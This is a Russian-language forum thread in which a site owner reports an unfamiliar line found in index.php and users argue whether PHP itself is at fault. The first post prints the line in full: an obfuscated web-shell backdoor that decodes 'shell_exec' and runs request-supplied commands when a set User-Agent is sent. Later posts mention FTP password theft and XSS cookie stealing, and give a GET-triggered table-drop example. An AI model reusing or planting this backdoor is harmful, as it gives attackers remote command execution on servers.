К списку форумов К списку тем
Регистрация    Правила    Главная форума    Поиск   
Имя: Пароль:
Рекомендовать в новости

Внимание! Проверьте свои index.php

Гость
0 - 06.06.2012 - 00:00
Обнаружил в index.php строку:

if($_SERVER['HTTP_USER_AGENT']=='D')**$fqvex=implode('e',array('bas','64_d','cod ',''));$xwkfrjir=$fqvex(str_replace('$&*(','l','c2 h$&*(bGxfZXh$&*(Yw=='));echo $xwkfrjir($_REQUEST['cM']);exit;**


Что она делает, не знаю, но я такого не писал.

Обнаружил только потому, что в файле было испорчено еще и название одной из функций и пользователь сообщил мне о неисправности.

Разбираемся пока с хостингом, как это туда попало, не знаю, будет ли толк.



Гость
41 - 26.06.2012 - 15:56
-- где-то в коде

так о том то и толкуют, для того что бы код, который сверху, заработал, он должен быть в файлах движка. а как он туда попадет - это другое дело.

Злоумышленник может украсть пароли из ftp клиента, и засунуть свой код, или же вы скачаете с неофициального сайта любой CMS систему уже зараженную, что особенно характерно для нуленной DLE, залить вам эксплоит с помощью которого добраться до сервераи выставить для себя права root. и все это может быть из за банальной невнимательности или лени программистов. Недавно Li.ru был взломан из-за недостаточной фильтрации входящих данных, Этот случай описан в журнале "Хакер". Залит эксплоит, украдены куки админа, а дальше полный доступ к серверу и базам данных. Что бы украсть куки использовался только JavaScript - наверно и его нужно отключать всем пользователям принудительно.
Гость
42 - 26.06.2012 - 16:29
Цитата:
Сообщение от Kuba Посмотреть сообщение
Что бы украсть куки использовался только JavaScript - наверно и его нужно отключать всем пользователям принудительн
вы же сами сказали, что «Залит эксплоит».
И тут же наехали на жабаскрипт. =))
Ха-ха, смешно.
Гость
43 - 26.06.2012 - 16:42
Я тоже посмеялся, Но еще раз про МатЧасть..

Эксплойт, эксплоит, сплоит (англ. exploit, эксплуатировать) — компьютерная программа, фрагмент программного кода или последовательность команд, использующие уязвимости в программном обеспечении и применяемые для проведения атаки на вычислительную систему. Целью атаки может быть как захват контроля над системой (повышение привилегий), так и нарушение её функционирования (DoS-атака).

Эксплойт может распространяться в виде исходных текстов, исполняемых модулей, или словесного описания использования уязвимости. Он может быть написан на любом компилируемом или интерпретируемом языке программирования (наиболее частые: C/C++, Perl, PHP, HTML+JavaScript)



Эксплоит в виде JavaScript бы послан адниму в обычном текстовом сообщении, а из за того, что программист поленился написать strip_tags(); htmlspecialchars(); не говоря уже о регулярках, этот код успешно выполнился на стороне админа.
Гость
44 - 26.06.2012 - 17:55
Цитата:
Сообщение от Kuba Посмотреть сообщение
Я тоже посмеялся, Но еще раз про МатЧасть..
не тупите.
Залить эксплойт и взломать при пом jabascript (вы ж предлагаете еще и отключить JS) это очень сильная мысль, не? =))

А теперь возвращаясь к теме.
Переменная функция, это уязвимость, хоть тресните.
Одно дело когда юзверь качает цмс с вредным кодом, другое дело когда юзверь качает цмс без вредного кода, но с возможностью внести его уже позднее кем угодно.
Вы разницу видите в этих двух примерах?
45 - 26.06.2012 - 21:13
Цитата:
Сообщение от Украинские субтитры Посмотреть сообщение
С огромным количеством разных джумл, достаточно одной-двух строчек где-то в коде, типа той что вверху. Юзерь сам ее закачает, а уж тот кто знает, без всякого фтп и прочего будет делать с сайтом чо хочет.
я чего-то не пойму. вы думаете что этот код (который указан в теме) был там изначально? Этот вредоносный код появился уже после взлома сайта, то есть, после получения доступа к сайту, каким-либо другим путем, к примеру кражи данных ftp. И уже после получения доступа к файлам сайта был внедрен этот код.

А сама по себе возможность выполнять функцию, которая указана в переменной (то есть конструкция $mayvar(); ) не является уязвимостью.
Гость
46 - 26.06.2012 - 21:52
Цитата:
Сообщение от Искусственный Интеллект1 Посмотреть сообщение
появился уже после взлома сайта, то есть, после получения доступа к сайту
возможно.
Но веть есть и возможность закачать этот код самим же юзерем и хацкеру, получается, не надо ничего взламывать.
Троянчег чистой воды получается.
Гость
47 - 26.06.2012 - 22:29
46-Украинские субтитры > Какая нафиг возможность ?!
Из чего троянчег получается ??? Опять вернемся к любой матчасти?

По вашему пользователь увидев такой код, вредоносный, на форуме немедленно кинется его вставлять в свои скрипты?? Чушь!

Что бы хакеру не пришлось вручную внедрять этот код он напишет троян, который будет сидеть на вашем компьютере, украдет пароль из клиента, этот троян передаст его другой программе, которая зайдет на хостинг, и рекурсивно откроет все файлы с необходимым расширением и допишет свой код. и сообщит хакеру адрес сайта на котором побывала.


Это проблема уже Вашего антивируса а не уязвимости PHP.
48 - 26.06.2012 - 23:08
46-Украинские субтитры >не понятна ваша логика. как уже написал Kuba, чего ради юзер будет этот код внедрять в свой сайт?
Проблема безопасности кода php не заключается в использовании конструкции $mayvar() или функции eval(), есть много способов взлома сайтов. К примеру посмотрите ссылки
http://www.phpfaq.ru/safety
http://www.programmersclub.ru/%D0%91...%D1%85-%D0%B4/
там кратко написаны уязвимости кода php.

Но это не проблемы самого php. Это задача программиста написать безопасный код, то есть чтоб не смогли его взломать и получить доступ к сайту.
Гость
49 - 26.06.2012 - 23:15
Цитата:
Сообщение от Искусственный Интеллект1 Посмотреть сообщение
чего ради юзер будет этот код внедрять в свой сайт?
этот код может быть в какой-то полумодной CMS =)

Цитата:
Сообщение от Искусственный Интеллект1 Посмотреть сообщение
есть много способов взлома сайтов
не сомневаюсь.
Но, как и ранее утверждал: это брешь в защите php.
Я так считаю. А вы можете не соглашаться. =)
Гость
50 - 26.06.2012 - 23:23
Пусть будет так..
51 - 26.06.2012 - 23:44
да будет свет! - сказал электрик и перерезал провода.

ЗЫ: я кажется понял! :) Украинские субтитры будет внедрять этот зловредный код на сайты своих клиентов и если что будет говорить, что это уязвимость самого php :)
Гость
52 - 27.06.2012 - 13:25
Цитата:
Сообщение от Искусственный Интеллект1 Посмотреть сообщение
Украинские субтитры будет внедрять этот зловредный код на сайты своих клиентов и если что будет говорить, что это уязвимость самого php
Что, если что? =)
53 - 27.06.2012 - 17:09
Если сами воспользуетесь данным кодом или хакер, а владелец сайта (заказчик) заметит это :)
Гость
54 - 27.06.2012 - 18:00
Цитата:
Сообщение от Искусственный Интеллект1 Посмотреть сообщение
Если сами воспользуетесь данным кодом или хакер, а владелец сайта (заказчик) заметит это :)
Я таким конечно не занимаюсь, в вот ваше предположение еще более подкрепляет мое мнение о том, что это лишняя дыра в безопасности PHP
Гость
55 - 27.06.2012 - 23:26
ЛОЛ, Опять по новой начнем спорить ??
Цитата:
о том, что это лишняя дыра в безопасности PHP
Это дыра только если этот код будет в коде сайта, в коде вашей системы или CMS которую вы поставили.

Если вы поставили систему с этим кодом сознательно, тоесть знали что он там есть, и знали где он есть, или если, что еще хуже сами его туда вставили, то дыра в голове у вас, или у того программиста, который это сделал.

Бессмысленно больше спорить. Давайте закроем тему, по крайней мере до тех пор, пока вы не научитесь чттать абзац полностью, а не выдирать знакомые слова, зачастую не верные по диагонали..


Написано же, синим по-русски,
Цитата:
Если сами воспользуетесь данным кодом или хакер,
..
Гость
56 - 27.06.2012 - 23:37
Для сравнения, если в коде движка будет где то содержаться примерно такой код:

//Это псевдокод, для любителей спорить.

if($_GET['drop']==true)**
mysql>drop_table(users);
**
то есть если перейти по адресу http://мойсайт.ru?drop=1, то удаляем таблицу пользователей.

Это огромнейшай дыра в системе безопасности ДВИЖКА, А не ПХП, точно так же, как и с кодом в первом посте. Если этого кода нет в CMS, то все впорядке.

Запросом GET вы не вставите его в файл PHP на сервере.

Цитата:
Хоть ты тресни !
Гость
57 - 28.06.2012 - 16:00
Цитата:
Сообщение от Kuba Посмотреть сообщение
Это дыра только если этот код будет в коде сайта, в коде вашей системы или CMS которую вы поставили.
про это и речь.
Это пехепешный троян в чистом виде. =)


К списку вопросов
Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск




Copyright ©, Все права защищены